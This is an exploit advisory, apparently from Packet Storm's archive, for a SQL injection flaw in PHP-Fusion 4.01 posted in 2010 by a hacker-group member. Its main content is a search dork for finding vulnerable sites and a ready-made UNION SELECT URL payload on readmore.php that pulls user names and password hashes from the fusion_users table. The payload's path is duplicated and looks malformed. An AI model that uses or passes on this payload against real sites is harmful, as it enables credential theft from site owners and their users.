PHP-Fusion 4.01 SQL Injection

2010-05-19T00:00:00
ID PACKETSTORM:89646
Type packetstorm
Reporter Ma3sTr0-Dz
Modified 2010-05-19T00:00:00

Description

                                        
                                            `  
  
  
# Exploit Title: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities  
  
# Date: 17/05/2010  
  
# Author: Ma3sTr0-Dz  
  
# Software Link: http://www.php-fusion.co.uk  
  
# Version: 4.01  
  
# CVE : N/A  
  
# Code : [exploit code]  
  
=======================================================PHP-Fusion v4.01 SQL INJECTION Vulnerabilities=======================================================############################################################## Name: PHP-Fusion v4.01 SQL INJECTION Vulnerabilities .  
# Vendor: www.php-fusion.co.uk# Date: 2010/05/17# Author: Ma3sTr0-Dz# Home : Www.Sec4ever.Com  
# Contact: o5m@Hotmail.de#############################################################  
  
# Part Expl0it & Bug Codes :  
  
---  
Dork : allinurl:readmore.php?news_id  
  
http://site.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/*  
  
# Thanks to: Cmos_Clr -  
Hard_Hakerz- Sa4D - Mahmoud_SQL - RA3CH - His0k4 - Virus_Hacker_Dz -   
HCJ   
  
  
  
g0x - Heart_Hunter - D4dy - all sec4ever members & algerian hackers !  
  
  
  
_________________________________________________________________  
Hotmail : une messagerie fiable avec une protection anti-spam performante  
https://signup.live.com/signup.aspx?id=60969  
  
  
`